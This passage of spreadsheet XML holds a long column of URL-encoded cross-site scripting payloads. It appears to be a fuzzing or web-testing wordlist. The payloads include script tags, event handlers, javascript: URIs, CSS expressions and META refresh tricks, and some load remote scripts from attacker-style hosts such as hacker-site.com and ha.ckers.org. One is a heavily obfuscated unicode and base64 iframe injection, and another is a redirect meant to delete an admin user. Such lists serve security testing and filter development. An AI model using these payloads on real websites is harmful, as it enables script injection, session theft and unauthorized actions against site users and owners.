    </row>
    <row r="2100">
      <c r="A2100" s="3" t="s">
        <v>1131</v>
      </c>
      <c r="B2100" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%5C%5C%27%29%3B%20alert%28%5C%27xss%5C%27%29%3Bvar%20x%3D%5C%27</v>
      </c>
    </row>
    <row r="2101">
      <c r="A2101" s="3" t="s">
        <v>1132</v>
      </c>
      <c r="B2101" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%2F%2F--%3E%3C%2FSCRIPT%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3B</v>
      </c>
    </row>
    <row r="2102">
      <c r="A2102" s="3" t="s">
        <v>1133</v>
      </c>
      <c r="B2102" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3E%22%3E%3CScRiPt%2520%250a%250d%3Ealert%28561177485777%29%253B%3C%2FScRiPt%3E</v>
      </c>
    </row>
    <row r="2103">
      <c r="A2103" s="3" t="s">
        <v>1134</v>
      </c>
      <c r="B2103" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cimg%20src%3D%22Mario%20Heiderich%20says%20that%20svg%20SHOULD%20not%20be%20executed%20trough%20image%20tags%22%20onerror%3D%22javascript%3Adocument.write%28%27%5Cu003c%5Cu0069%5Cu0066%5Cu0072%5Cu0061%5Cu006d%5Cu0065%5Cu0020%5Cu0073%5Cu0072%5Cu0063%5Cu003d%5Cu0022%5Cu0064%5Cu0061%5Cu0074%5Cu0061%5Cu003a%5Cu0069%5Cu006d%5Cu0061%5Cu0067%5Cu0065%5Cu002f%5Cu0073%5Cu0076%5Cu0067%5Cu002b%5Cu0078%5Cu006d%5Cu006c%5Cu003b%5Cu0062%5Cu0061%5Cu0073%5Cu0065%5Cu0036%5Cu0034%5Cu002c%5Cu0050%5Cu0048%5Cu004e%5Cu0032%5Cu005a%5Cu0079%5Cu0042%5Cu0034%5Cu0062%5Cu0057%5Cu0078%5Cu0075%5Cu0063%5Cu007a%5Cu0030%5Cu0069%5Cu0061%5Cu0048%5Cu0052%5Cu0030%5Cu0063%5Cu0044%5Cu006f%5Cu0076%5Cu004c%5Cu0033%5Cu0064%5Cu0033%5Cu0064%5Cu0079%5Cu0035%5Cu0033%5Cu004d%5Cu0079%5Cu0035%5Cu0076%5Cu0063%5Cu006d%5Cu0063%5Cu0076%5Cu004d%5Cu006a%5Cu0041%5Cu0077%5Cu004d%5Cu0043%5Cu0039%5Cu007a%5Cu0064%5Cu006d%5Cu0063%5Cu0069%5Cu0050%5Cu0069%5Cu0041%5Cu0067%5Cu0043%5Cu0069%5Cu0041%5Cu0067%5Cu0049%5Cu0044%5Cu0078%5Cu0070%5Cu0062%5Cu0057%5Cu0046%5Cu006e%5Cu005a%5Cu0053%5Cu0042%5Cu0076%5Cu0062%5Cu006d%5Cu0078%5Cu0076%5Cu0059%5Cu0057%5Cu0051%5Cu0039%5Cu0049%5Cu006d%5Cu0046%5Cu0073%5Cu005a%5Cu0058%5Cu004a%5Cu0030%5Cu004b%5Cu0044%5Cu0045%5Cu0070%5Cu0049%5Cu006a%5Cu0034%5Cu0038%5Cu004c%5Cu0032%5Cu006c%5Cu0074%5Cu0059%5Cu0057%5Cu0064%5Cu006c%5Cu0050%5Cu0069%5Cu0041%5Cu0067%5Cu0043%5Cu0069%5Cu0041%5Cu0067%5Cu0049%5Cu0044%5Cu0078%5Cu007a%5Cu0064%5Cu006d%5Cu0063%5Cu0067%5Cu0062%5Cu0032%5Cu0035%5Cu0073%5Cu0062%5Cu0032%5Cu0046%5Cu006b%5Cu0050%5Cu0053%5Cu004a%5Cu0068%5Cu0062%5Cu0047%5Cu0056%5Cu0079%5Cu0064%5Cu0043%5Cu0067%5Cu0079%5Cu004b%5Cu0053%5Cu0049%5Cu002b%5Cu0050%5Cu0043%5Cu0039%5Cu007a%5Cu0064%5Cu006d%5Cu0063%5Cu002b%5Cu0049%5Cu0043%5Cu0041%5Cu004b%5Cu0049%5Cu0043%5Cu0041%5Cu0067%5Cu0050%5Cu0048%5Cu004e%5Cu006a%5Cu0063%5Cu006d%5Cu006c%5Cu0077%5Cu0064%5Cu0044%5Cu0035%5Cu0068%5Cu0062%5Cu0047%5Cu0056%5Cu0079%5Cu0064%5Cu0043%5Cu0067%5Cu007a%5Cu004b%5Cu0054%5Cu0077%5Cu0076%5Cu0063%5Cu0032%5Cu004e%5Cu0079%5Cu0061%5Cu0058%5Cu0042%5Cu0030%5Cu0050%5Cu0069%5Cu0041%5Cu0067%5Cu0043%5Cu0069%5Cu0041%5Cu0067%5Cu0049%5Cu0044%5Cu0078%5Cu006b%5Cu005a%5Cu0057%5Cu005a%5Cu007a%5Cu0049%5Cu0047%5Cu0039%5Cu0075%5Cu0062%5Cu0047%5Cu0039%5Cu0068%5Cu005a%5Cu0044%5Cu0030%5Cu0069%5Cu0059%5Cu0057%5Cu0078%5Cu006c%5Cu0063%5Cu006e%5Cu0051%5Cu006f%5Cu004e%5Cu0043%5Cu006b%5Cu0069%5Cu0050%5Cu006a%5Cu0077%5Cu0076%5Cu005a%5Cu0047%5Cu0056%5Cu006d%5Cu0063%5Cu007a%5Cu0034%5Cu0067%5Cu0049%5Cu0041%5Cu006f%5Cu0067%5Cu0049%5Cu0043%5Cu0041%5Cu0038%5Cu005a%5Cu0079%5Cu0042%5Cu0076%5Cu0062%5Cu006d%5Cu0078%5Cu0076%5Cu0059%5Cu0057%5Cu0051%5Cu0039%5Cu0049%5Cu006d%5Cu0046%5Cu0073%5Cu005a%5Cu0058%5Cu004a%5Cu0030%5Cu004b%5Cu0044%5Cu0055%5Cu0070%5Cu0049%5Cu006a%5Cu0034%5Cu0067%5Cu0049%5Cu0041%5Cu006f%5Cu0067%5Cu0049%5Cu0043%5Cu0041%5Cu0067%5Cu0049%5Cu0043%5Cu0041%5Cu0067%5Cu0050%5Cu0047%5Cu004e%5Cu0070%5Cu0063%5Cu006d%5Cu004e%5Cu0073%5Cu005a%5Cu0053%5Cu0042%5Cu0076%5Cu0062%5Cu006d%5Cu0078%5Cu0076%5Cu0059%5Cu0057%5Cu0051%5Cu0039%5Cu0049%5Cu006d%5Cu0046%5Cu0073%5Cu005a%5Cu0058%5Cu004a%5Cu0030%5Cu004b%5Cu0044%5Cu0059%5Cu0070%5Cu0049%5Cu0069%5Cu0041%5Cu0076%5Cu0050%5Cu0069%5Cu0041%5Cu0067%5Cu0043%5Cu0069%5Cu0041%5Cu0067%5Cu0049%5Cu0043%5Cu0041%5Cu0067%5Cu0049%5Cu0043%5Cu0041%5Cu0038%5Cu0064%5Cu0047%5Cu0056%5Cu0034%5Cu0064%5Cu0043%5Cu0042%5Cu0076%5Cu0062%5Cu006d%5Cu0078%5Cu0076%5Cu0059%5Cu0057%5Cu0051%5Cu0039%5Cu0049%5Cu006d%5Cu0046%5Cu0073%5Cu005a%5Cu0058%5Cu004a%5Cu0030%5Cu004b%5Cu0044%5Cu0063%5Cu0070%5Cu0049%5Cu006a%5Cu0034%5Cu0038%5Cu004c%5Cu0033%5Cu0052%5Cu006c%5Cu0065%5Cu0048%5Cu0051%5Cu002b%5Cu0049%5Cu0043%5Cu0041%5Cu004b%5Cu0049%5Cu0043%5Cu0041%5Cu0067%5Cu0050%5Cu0043%5Cu0039%5Cu006e%5Cu0050%5Cu0069%5Cu0041%5Cu0067%5Cu0043%5Cu006a%5Cu0077%5Cu0076%5Cu0063%5Cu0033%5Cu005a%5Cu006e%5Cu0050%5Cu0069%5Cu0041%5Cu0067%5Cu0022%5Cu003e%5Cu003c%5Cu002f%5Cu0069%5Cu0066%5Cu0072%5Cu0061%5Cu006d%5Cu0065%5Cu003e%27%29%3B%22%3E%3C%2Fimg%3E</v>
      </c>
    </row>
    <row r="2104">
      <c r="A2104" s="3" t="s">
        <v>1135</v>
      </c>
      <c r="B2104" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%2Fbody%3E</v>
      </c>
    </row>
    <row r="2105">
      <c r="A2105" s="3" t="s">
        <v>1136</v>
      </c>
      <c r="B2105" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%2Fhtml%3E</v>
      </c>
    </row>
    <row r="2106">
      <c r="A2106" s="3" t="s">
        <v>1137</v>
      </c>
      <c r="B2106" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CSCRIPT%20SRC%3Dhttp%3A%2F%2Fhacker-site.com%2Fxss.js%3E%3C%2FSCRIPT%3E</v>
      </c>
    </row>
    <row r="2107">
      <c r="A2107" s="3" t="s">
        <v>1138</v>
      </c>
      <c r="B2107" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CSCRIPT%3E%20alert%28%E2%80%9CXSS%E2%80%9D%29%3B%20%3C%2FSCRIPT%3E</v>
      </c>
    </row>
    <row r="2108">
      <c r="A2108" s="3" t="s">
        <v>1139</v>
      </c>
      <c r="B2108" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CBODY%20ONLOAD%3Dalert%28%22XSS%22%29%3E</v>
      </c>
    </row>
    <row r="2109">
      <c r="A2109" s="3" t="s">
        <v>496</v>
      </c>
      <c r="B2109" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CBODY%20BACKGROUND%3D%22javascript%3Aalert%28%27XSS%27%29%22%3E</v>
      </c>
    </row>
    <row r="2110">
      <c r="A2110" s="3" t="s">
        <v>464</v>
      </c>
      <c r="B2110" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20SRC%3D%22javascript%3Aalert%28%27XSS%27%29%3B%22%3E</v>
      </c>
    </row>
    <row r="2111">
      <c r="A2111" s="3" t="s">
        <v>497</v>
      </c>
      <c r="B2111" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20DYNSRC%3D%22javascript%3Aalert%28%27XSS%27%29%22%3E</v>
      </c>
    </row>
    <row r="2112">
      <c r="A2112" s="3" t="s">
        <v>498</v>
      </c>
      <c r="B2112" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20LOWSRC%3D%22javascript%3Aalert%28%27XSS%27%29%22%3E</v>
      </c>
    </row>
    <row r="2113">
      <c r="A2113" s="3" t="s">
        <v>1140</v>
      </c>
      <c r="B2113" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIFRAME%20SRC%3D%E2%80%9Dhttp%3A%2F%2Fhacker-site.com%2Fxss.html%E2%80%9D%3E</v>
      </c>
    </row>
    <row r="2114">
      <c r="A2114" s="3" t="s">
        <v>495</v>
      </c>
      <c r="B2114" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CINPUT%20TYPE%3D%22IMAGE%22%20SRC%3D%22javascript%3Aalert%28%27XSS%27%29%3B%22%3E</v>
      </c>
    </row>
    <row r="2115">
      <c r="A2115" s="3" t="s">
        <v>505</v>
      </c>
      <c r="B2115" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CLINK%20REL%3D%22stylesheet%22%20HREF%3D%22javascript%3Aalert%28%27XSS%27%29%3B%22%3E</v>
      </c>
    </row>
    <row r="2116">
      <c r="A2116" s="3" t="s">
        <v>525</v>
      </c>
      <c r="B2116" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CTABLE%20BACKGROUND%3D%22javascript%3Aalert%28%27XSS%27%29%22%3E</v>
      </c>
    </row>
    <row r="2117">
      <c r="A2117" s="3" t="s">
        <v>1141</v>
      </c>
      <c r="B2117" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CTD%20BACKGROUND%3D%22javascript%3Aalert%28%27XSS%27%29%22%3E</v>
      </c>
    </row>
    <row r="2118">
      <c r="A2118" s="3" t="s">
        <v>527</v>
      </c>
      <c r="B2118" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CDIV%20STYLE%3D%22background-image%3A%20url%28javascript%3Aalert%28%27XSS%27%29%29%22%3E</v>
      </c>
    </row>
    <row r="2119">
      <c r="A2119" s="3" t="s">
        <v>530</v>
      </c>
      <c r="B2119" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CDIV%20STYLE%3D%22width%3A%20expression%28alert%28%27XSS%27%29%29%3B%22%3E</v>
      </c>
    </row>
    <row r="2120">
      <c r="A2120" s="3" t="s">
        <v>1142</v>
      </c>
      <c r="B2120" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3COBJECT%20TYPE%3D%22text%2Fx-scriptlet%22%20DATA%3D%22http%3A%2F%2Fhacker.com%2Fxss.html%22%3E</v>
      </c>
    </row>
    <row r="2121">
      <c r="A2121" s="3" t="s">
        <v>1143</v>
      </c>
      <c r="B2121" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CEMBED%20SRC%3D%22http%3A%2F%2Fhacker.com%2Fxss.swf%22%20AllowScriptAccess%3D%22always%22%3E</v>
      </c>
    </row>
    <row r="2122">
      <c r="A2122" s="3" t="s">
        <v>1144</v>
      </c>
      <c r="B2122" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26apos%3B%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%26apos%3B%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%26quot%3B%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%26quot%3B%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F--%26gt%3B%26lt%3B%2FSCRIPT%26gt%3B%26quot%3B%26gt%3B%26apos%3B%26gt%3B%26lt%3BSCRIPT%26gt%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%26lt%3B%2FSCRIPT%26gt%3B</v>
      </c>
    </row>
    <row r="2123">
      <c r="A2123" s="3" t="s">
        <v>1145</v>
      </c>
      <c r="B2123" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26apos%3B%26apos%3B%3B%21--%26quot%3B%26lt%3BXSS%26gt%3B%3D%26amp%3B%7B%28%29%7D</v>
      </c>
    </row>
    <row r="2124">
      <c r="A2124" s="3" t="s">
        <v>1146</v>
      </c>
      <c r="B2124" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26lt%3BSCRIPT%26gt%3Balert%28%26apos%3BXSS%26apos%3B%29%26lt%3B%2FSCRIPT%26gt%3B</v>
      </c>
    </row>
    <row r="2125">
      <c r="A2125" s="3" t="s">
        <v>1147</v>
      </c>
      <c r="B2125" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26lt%3BSCRIPT%20SRC%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js%26gt%3B%26lt%3B%2FSCRIPT%26gt%3B</v>
      </c>
    </row>
    <row r="2126">
      <c r="A2126" s="3" t="s">
        <v>1148</v>
      </c>
      <c r="B2126" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26lt%3BSCRIPT%26gt%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%26lt%3B%2FSCRIPT%26gt%3B</v>
      </c>
    </row>
    <row r="2127">
      <c r="A2127" s="3" t="s">
        <v>1149</v>
      </c>
      <c r="B2127" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26lt%3BBASE%20HREF%3D%26quot%3Bjavascript%3Aalert%28%26apos%3BXSS%26apos%3B%29%3B%2F%2F%26quot%3B%26gt%3B</v>
      </c>
    </row>
    <row r="2128">
      <c r="A2128" s="3" t="s">
        <v>1150</v>
      </c>
      <c r="B2128" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26lt%3BBGSOUND%20SRC%3D%26quot%3Bjavascript%3Aalert%28%26apos%3BXSS%26apos%3B%29%3B%26quot%3B%26gt%3B</v>
      </c>
    </row>
    <row r="2129">
      <c r="A2129" s="3" t="s">
        <v>1151</v>
      </c>
      <c r="B2129" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26lt%3BBODY%20BACKGROUND%3D%26quot%3Bjavascript%3Aalert%28%26apos%3BXSS%26apos%3B%29%3B%26quot%3B%26gt%3B</v>
      </c>
    </row>
    <row r="2130">
      <c r="A2130" s="3" t="s">
        <v>1152</v>
      </c>
      <c r="B2130" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26lt%3BBODY%20ONLOAD%3Dalert%28%26apos%3BXSS%26apos%3B%29%26gt%3B</v>
      </c>
    </row>
    <row r="2131">
      <c r="A2131" s="3" t="s">
        <v>1153</v>
      </c>
      <c r="B2131" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26lt%3BDIV%20STYLE%3D%26quot%3Bbackground-image%3A%20url%28javascript%3Aalert%28%26apos%3BXSS%26apos%3B%29%29%26quot%3B%26gt%3B</v>
      </c>
    </row>
    <row r="2132">
      <c r="A2132" s="3" t="s">
        <v>1154</v>
      </c>
      <c r="B2132" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26lt%3BDIV%20STYLE%3D%26quot%3Bbackground-image%3A%20url%28%26amp%3B%231%3Bjavascript%3Aalert%28%26apos%3BXSS%26apos%3B%29%29%26quot%3B%26gt%3B</v>
      </c>
    </row>
    <row r="2133">
      <c r="A2133" s="3" t="s">
        <v>1155</v>
      </c>
      <c r="B2133" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26lt%3BDIV%20STYLE%3D%26quot%3Bwidth%3A%20expression%28alert%28%26apos%3BXSS%26apos%3B%29%29%3B%26quot%3B%26gt%3B</v>
      </c>
    </row>
    <row r="2134">
      <c r="A2134" s="3" t="s">
        <v>1156</v>
      </c>
      <c r="B2134" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26lt%3BFRAMESET%26gt%3B%26lt%3BFRAME%20SRC%3D%26quot%3Bjavascript%3Aalert%28%26apos%3BXSS%26apos%3B%29%3B%26quot%3B%26gt%3B%26lt%3B%2FFRAMESET%26gt%3B</v>
      </c>
    </row>
    <row r="2135">
      <c r="A2135" s="3" t="s">
        <v>1157</v>
      </c>
      <c r="B2135" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26lt%3BIFRAME%20SRC%3D%26quot%3Bjavascript%3Aalert%28%26apos%3BXSS%26apos%3B%29%3B%26quot%3B%26gt%3B%26lt%3B%2FIFRAME%26gt%3B</v>
      </c>
    </row>
    <row r="2136">
      <c r="A2136" s="3" t="s">
        <v>1158</v>
      </c>
      <c r="B2136" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26lt%3BINPUT%20TYPE%3D%26quot%3BIMAGE%26quot%3B%20SRC%3D%26quot%3Bjavascript%3Aalert%28%26apos%3BXSS%26apos%3B%29%3B%26quot%3B%26gt%3B</v>
      </c>
    </row>
    <row r="2137">
      <c r="A2137" s="3" t="s">
        <v>1159</v>
      </c>
      <c r="B2137" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26lt%3BIMG%20SRC%3D%26quot%3Bjavascript%3Aalert%28%26apos%3BXSS%26apos%3B%29%3B%26quot%3B%26gt%3B</v>
      </c>
    </row>
    <row r="2138">
      <c r="A2138" s="3" t="s">
        <v>1160</v>
      </c>
      <c r="B2138" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26lt%3BIMG%20SRC%3Djavascript%3Aalert%28%26apos%3BXSS%26apos%3B%29%26gt%3B</v>
      </c>
    </row>
    <row r="2139">
      <c r="A2139" s="3" t="s">
        <v>1161</v>
      </c>
      <c r="B2139" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26lt%3BIMG%20DYNSRC%3D%26quot%3Bjavascript%3Aalert%28%26apos%3BXSS%26apos%3B%29%3B%26quot%3B%26gt%3B</v>
      </c>
    </row>
    <row r="2140">
      <c r="A2140" s="3" t="s">
        <v>1162</v>
      </c>
      <c r="B2140" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26lt%3BIMG%20LOWSRC%3D%26quot%3Bjavascript%3Aalert%28%26apos%3BXSS%26apos%3B%29%3B%26quot%3B%26gt%3B</v>
      </c>
    </row>
    <row r="2141">
      <c r="A2141" s="3" t="s">
        <v>1163</v>
      </c>
      <c r="B2141" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26lt%3BIMG%20SRC%3D%26quot%3Bhttp%3A%2F%2Fwww.thesiteyouareon.com%2Fsomecommand.php%3Fsomevariables%3Dmaliciouscode%26quot%3B%26gt%3B</v>
      </c>
    </row>
    <row r="2142">
      <c r="A2142" s="3" t="s">
        <v>1164</v>
      </c>
      <c r="B2142" s="4" t="str">
        <f t="shared" si="1"/>
        <v>Redirect%20302%20%2Fa.jpg%20http%3A%2F%2Fvictimsite.com%2Fadmin.asp%26amp%3Bdeleteuser</v>
      </c>
    </row>
    <row r="2143">
      <c r="A2143" s="3" t="s">
        <v>1165</v>
      </c>
      <c r="B2143" s="4" t="str">
        <f t="shared" si="1"/>
        <v>exp%2F%2A%26lt%3BXSS%20STYLE%3D%26apos%3Bno%5Cxss%3Anoxss%28%26quot%3B%2A%2F%2F%2A%26quot%3B%29%3B</v>
      </c>
    </row>
    <row r="2144">
      <c r="A2144" s="3" t="s">
        <v>1166</v>
      </c>
      <c r="B2144" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26lt%3BSTYLE%26gt%3Bli%20%7Blist-style-image%3A%20url%28%26quot%3Bjavascript%3Aalert%28%26%2339%3BXSS%26%2339%3B%29%26quot%3B%29%3B%7D%26lt%3B%2FSTYLE%26gt%3B%26lt%3BUL%26gt%3B%26lt%3BLI%26gt%3BXSS</v>
      </c>
    </row>
    <row r="2145">
      <c r="A2145" s="3" t="s">
        <v>1167</v>
      </c>
      <c r="B2145" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26lt%3BIMG%20SRC%3D%26apos%3Bvbscript%3Amsgbox%28%26quot%3BXSS%26quot%3B%29%26apos%3B%26gt%3B</v>
      </c>
    </row>
    <row r="2146">
      <c r="A2146" s="3" t="s">
        <v>1168</v>
      </c>
      <c r="B2146" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26lt%3BLAYER%20SRC%3D%26quot%3Bhttp%3A%2F%2Fha.ckers.org%2Fscriptlet.html%26quot%3B%26gt%3B%26lt%3B%2FLAYER%26gt%3B</v>
      </c>
    </row>
    <row r="2147">
      <c r="A2147" s="3" t="s">
        <v>1169</v>
      </c>
      <c r="B2147" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26lt%3BIMG%20SRC%3D%26quot%3Blivescript%3A%5Bcode%5D%26quot%3B%26gt%3B</v>
      </c>
    </row>
    <row r="2148">
      <c r="A2148" s="3" t="s">
        <v>1170</v>
      </c>
      <c r="B2148" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%25BCscript%25BEalert%28%25A2XSS%25A2%29%25BC%2Fscript%25BE</v>
      </c>
    </row>
    <row r="2149">
      <c r="A2149" s="3" t="s">
        <v>1171</v>
      </c>
      <c r="B2149" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26lt%3BMETA%20HTTP-EQUIV%3D%26quot%3Brefresh%26quot%3B%20CONTENT%3D%26quot%3B0%3Burl%3Djavascript%3Aalert%28%26apos%3BXSS%26apos%3B%29%3B%26quot%3B%26gt%3B</v>
      </c>
    </row>
    <row r="2150">
      <c r="A2150" s="3" t="s">
        <v>1172</v>
      </c>
      <c r="B2150" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26lt%3BMETA%20HTTP-EQUIV%3D%26quot%3Brefresh%26quot%3B%20CONTENT%3D%26quot%3B0%3Burl%3Ddata%3Atext%2Fhtml%3Bbase64%2CPHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K%26quot%3B%26gt%3B</v>
      </c>
    </row>
    <row r="2151">
      <c r="A2151" s="3" t="s">
        <v>1173</v>
      </c>
      <c r="B2151" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26lt%3BMETA%20HTTP-EQUIV%3D%26quot%3Brefresh%26quot%3B%20CONTENT%3D%26quot%3B0%3B%20URL%3Dhttp%3A%2F%2F%3BURL%3Djavascript%3Aalert%28%26apos%3BXSS%26apos%3B%29%3B%26quot%3B%26gt%3B</v>
      </c>
    </row>
    <row r="2152">
      <c r="A2152" s="3" t="s">
        <v>1174</v>
      </c>
      <c r="B2152" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26lt%3BIMG%20SRC%3D%26quot%3Bmocha%3A%5Bcode%5D%26quot%3B%26gt%3B</v>
      </c>
    </row>
    <row r="2153">
      <c r="A2153" s="3" t="s">
        <v>1175</v>
      </c>
      <c r="B2153" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26lt%3BOBJECT%20TYPE%3D%26quot%3Btext%2Fx-scriptlet%26quot%3B%20DATA%3D%26quot%3Bhttp%3A%2F%2Fha.ckers.org%2Fscriptlet.html%26quot%3B%26gt%3B%26lt%3B%2FOBJECT%26gt%3B</v>
      </c>
    </row>
    <row r="2154">
      <c r="A2154" s="3" t="s">
        <v>1176</v>
      </c>
      <c r="B2154" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26lt%3BOBJECT%20classid%3Dclsid%3Aae24fdae-03c6-11d1-8b76-0080c744f389%26gt%3B%26lt%3Bparam%20name%3Durl%20value%3Djavascript%3Aalert%28%26apos%3BXSS%26apos%3B%29%26gt%3B%26lt%3B%2FOBJECT%26gt%3B</v>
      </c>
    </row>
    <row r="2155">
      <c r="A2155" s="3" t="s">
        <v>1177</v>
      </c>
      <c r="B2155" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26lt%3BEMBED%20SRC%3D%26quot%3Bhttp%3A%2F%2Fha.ckers.org%2Fxss.swf%26quot%3B%20AllowScriptAccess%3D%26quot%3Balways%26quot%3B%26gt%3B%26lt%3B%2FEMBED%26gt%3B</v>
      </c>
    </row>
    <row r="2156">
      <c r="A2156" s="3" t="s">
        <v>1178</v>
      </c>
      <c r="B2156" s="4" t="str">
        <f t="shared" si="1"/>
        <v>a%3D%26quot%3Bget%26quot%3B%3B%26amp%3B%2310%3Bb%3D%26quot%3BURL%28%26quot%3B%26quot%3B%3B%26amp%3B%2310%3Bc%3D%26quot%3Bjavascript%3A%26quot%3B%3B%26amp%3B%2310%3Bd%3D%26quot%3Balert%28%26apos%3BXSS%26apos%3B%29%3B%26quot%3B%29%26quot%3B%3B%26%2310%3Beval%28a%2Bb%2Bc%2Bd%29%3B</v>
      </c>
    </row>
    <row r="2157">
      <c r="A2157" s="3" t="s">
        <v>1179</v>
      </c>
      <c r="B2157" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26lt%3BSTYLE%20TYPE%3D%26quot%3Btext%2Fjavascript%26quot%3B%26gt%3Balert%28%26apos%3BXSS%26apos%3B%29%3B%26lt%3B%2FSTYLE%26gt%3B</v>
      </c>
    </row>
    <row r="2158">
      <c r="A2158" s="3" t="s">
        <v>1180</v>
      </c>
      <c r="B2158" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26lt%3BIMG%20STYLE%3D%26quot%3Bxss%3Aexpr%2F%2AXSS%2A%2Fession%28alert%28%26apos%3BXSS%26apos%3B%29%29%26quot%3B%26gt%3B</v>
      </c>
    </row>
    <row r="2159">
      <c r="A2159" s="3" t="s">
        <v>1181</v>
      </c>
      <c r="B2159" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26lt%3BXSS%20STYLE%3D%26quot%3Bxss%3Aexpression%28alert%28%26apos%3BXSS%26apos%3B%29%29%26quot%3B%26gt%3B</v>
      </c>
    </row>
    <row r="2160">
      <c r="A2160" s="3" t="s">
        <v>1182</v>
      </c>
      <c r="B2160" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26lt%3BSTYLE%26gt%3B.XSS%7Bbackground-image%3Aurl%28%26quot%3Bjavascript%3Aalert%28%26apos%3BXSS%26apos%3B%29%26quot%3B%29%3B%7D%26lt%3B%2FSTYLE%26gt%3B%26lt%3BA%20CLASS%3DXSS%26gt%3B%26lt%3B%2FA%26gt%3B</v>
      </c>
    </row>
    <row r="2161">
      <c r="A2161" s="3" t="s">
        <v>1183</v>
      </c>
      <c r="B2161" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26lt%3BSTYLE%20type%3D%26quot%3Btext%2Fcss%26quot%3B%26gt%3BBODY%7Bbackground%3Aurl%28%26quot%3Bjavascript%3Aalert%28%26apos%3BXSS%26apos%3B%29%26quot%3B%29%7D%26lt%3B%2FSTYLE%26gt%3B</v>
      </c>
    </row>
    <row r="2162">
      <c r="A2162" s="3" t="s">
        <v>1184</v>
      </c>
      <c r="B2162" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26lt%3BLINK%20REL%3D%26quot%3Bstylesheet%26quot%3B%20HREF%3D%26quot%3Bjavascript%3Aalert%28%26apos%3BXSS%26apos%3B%29%3B%26quot%3B%26gt%3B</v>
      </c>
    </row>
    <row r="2163">
      <c r="A2163" s="3" t="s">
        <v>1185</v>
      </c>
      <c r="B2163" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26lt%3BLINK%20REL%3D%26quot%3Bstylesheet%26quot%3B%20HREF%3D%26quot%3Bhttp%3A%2F%2Fha.ckers.org%2Fxss.css%26quot%3B%26gt%3B</v>
      </c>
    </row>
    <row r="2164">
      <c r="A2164" s="3" t="s">
        <v>1186</v>
      </c>
      <c r="B2164" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26lt%3BSTYLE%26gt%3B%40import%26apos%3Bhttp%3A%2F%2Fha.ckers.org%2Fxss.css%26apos%3B%3B%26lt%3B%2FSTYLE%26gt%3B</v>
      </c>
    </row>
    <row r="2165">
      <c r="A2165" s="3" t="s">
        <v>1187</v>
      </c>
      <c r="B2165" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26lt%3BMETA%20HTTP-EQUIV%3D%26quot%3BLink%26quot%3B%20Content%3D%26quot%3B%26lt%3Bhttp%3A%2F%2Fha.ckers.org%2Fxss.css%26gt%3B%3B%20REL%3Dstylesheet%26quot%3B%26gt%3B</v>
      </c>
    </row>
    <row r="2166">
